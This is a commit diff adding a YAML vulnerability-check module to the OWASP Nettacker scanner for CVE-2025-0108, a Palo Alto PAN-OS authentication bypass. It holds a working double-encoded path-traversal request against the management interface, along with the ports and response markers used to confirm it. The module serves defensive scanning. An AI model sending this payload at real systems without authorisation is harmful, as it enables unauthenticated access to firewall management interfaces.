adding paloalto_panos_cve_2025_0108_vuln module

OWASP · Feb 17, 2025 · d76eb0b · d76eb0b
1 parent 012bf5d
commit d76eb0b
Show file tree

Hide file tree

Showing 2 changed files with 60 additions and 0 deletions.
diff --git a/docs/Modules.md b/docs/Modules.md
@@ -143,6 +143,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 * '**msexchange_cve_2021_26855**' - check the target for MS Exchange SSRF CVE-2021-26855 (proxylogon/hafnium)
 * '**http_cors_vuln**' - check the web server for overly-permissive CORS (header 'Access-Control-Allow-Origin'=*)
 * '**options_method_enabled_vuln**' - check if OPTIONS method is enabled on the web server
+* '**paloalto_panos_cve_2025_0108_vuln** - check the target for PaloAlto PAN-OS CVE-2025-0108 vulnerability
 * '**ProFTPd_bypass_sqli_protection_vuln**' - check ProFTPd for CVE-2009-0543
 * '**ProFTPd_cpu_consumption_vuln**' - check ProFTPd for CVE-2008-7265
 * '**ProFTPd_directory_traversal_vuln**' - check ProFTPd for CVE-2010-3867

diff --git a/nettacker/modules/vuln/paloalto_panos_cve_2025_0108.yaml b/nettacker/modules/vuln/paloalto_panos_cve_2025_0108.yaml
@@ -0,0 +1,59 @@
+info:
+  name: paloalto_panos_cve_2025_0108_vuln
+  author: OWASP Nettacker team 
+  severity: 8.8
+  description: CVE-2025-0108 is an authentication bypass in the Palo Alto Networks PAN-OS software, which enables an unauthenticated attacker with network access to the management web interface to bypass the authentication
+  reference: 
+    - https://security.paloaltonetworks.com/CVE-2025-0108
+    - https://www.assetnote.io/resources/research/nginx-apache-path-confusion-to-auth-bypass-in-pan-os
+    - https://www.bleepingcomputer.com/news/security/hackers-exploit-authentication-bypass-in-palo-alto-networks-pan-os/
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - high_severity
+    - cve
+    - paloalto
+    - paloalto_panos
+    - panos
+
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:  
+                - "unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 4443
+                - 8443
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            header:
+              Content-Type: 
+                regex: text/html
+                reverse: false
+            content:
+              regex: "Zero Touch Provisioning"
+              reverse: false